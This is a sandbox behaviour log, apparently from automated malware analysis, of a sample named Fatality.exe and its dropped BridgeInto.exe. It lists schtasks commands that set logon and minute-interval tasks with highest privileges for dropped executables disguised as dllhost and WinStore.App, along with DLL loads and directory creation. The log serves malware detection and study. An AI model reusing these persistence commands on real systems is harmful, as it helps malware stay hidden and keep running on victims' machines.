                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 6 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f
                              Source: unknown, Process created: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f
                              Source: unknown, Process created: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 10 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BridgeInto" /sc ONLOGON /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 9 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.bat"
                              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: unknown, Process created: C:\Bridgemonitor\BridgeInto.exe C:\Bridgemonitor\BridgeInto.exe
                              Source: unknown, Process created: C:\Bridgemonitor\BridgeInto.exe C:\Bridgemonitor\BridgeInto.exe
                              Source: unknown, Process created: C:\Recovery\dllhost.exe C:\Recovery\dllhost.exe
                              Source: unknown, Process created: C:\Recovery\dllhost.exe C:\Recovery\dllhost.exe
                              Source: C:\Windows\System32\cmd.exe, Process created: unknown unknown
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: version.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: esent.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\dllhost.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: version.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: wldp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: profapi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ktmw32.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: wbemcomn.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: amsi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: userenv.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: iphlpapi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: dnsapi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: winnsi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rasapi32.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rasman.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rtutils.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: mswsock.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: winhttp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rasadhlp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: fwpuclnt.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: winmm.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: winmmbase.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: mmdevapi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: devobj.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ksuser.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: avrt.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: audioses.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: powrprof.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: umpdc.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: edputil.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: msacm32.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: midimap.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: dwrite.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: windowscodecs.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ntmarta.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: version.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: wldp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: profapi.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: mscoree.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: kernel.appcore.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: version.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: uxtheme.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: windows.storage.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wldp.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: profapi.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptsp.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: rsaenh.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptbase.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: sspicli.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: mscoree.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: kernel.appcore.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: version.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: uxtheme.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: windows.storage.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: wldp.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: profapi.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptsp.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: rsaenh.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: cryptbase.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: version.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: wldp.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: profapi.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\Fatality.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Bridgemonitor\BridgeInto.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe
                              Source: C:\Bridgemonitor\BridgeInto.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\c917822ecb0d66
                              Source: Fatality.exe Static file information: File size 3517117 > 1048576
                              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Fatality.exe, Fatality.exe, 00000000.00000002.2133149827.0000000000891000.00000040.00000001.01000000.00000003.sdmp
                              Source: Binary string: :C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.pdb source: BridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp
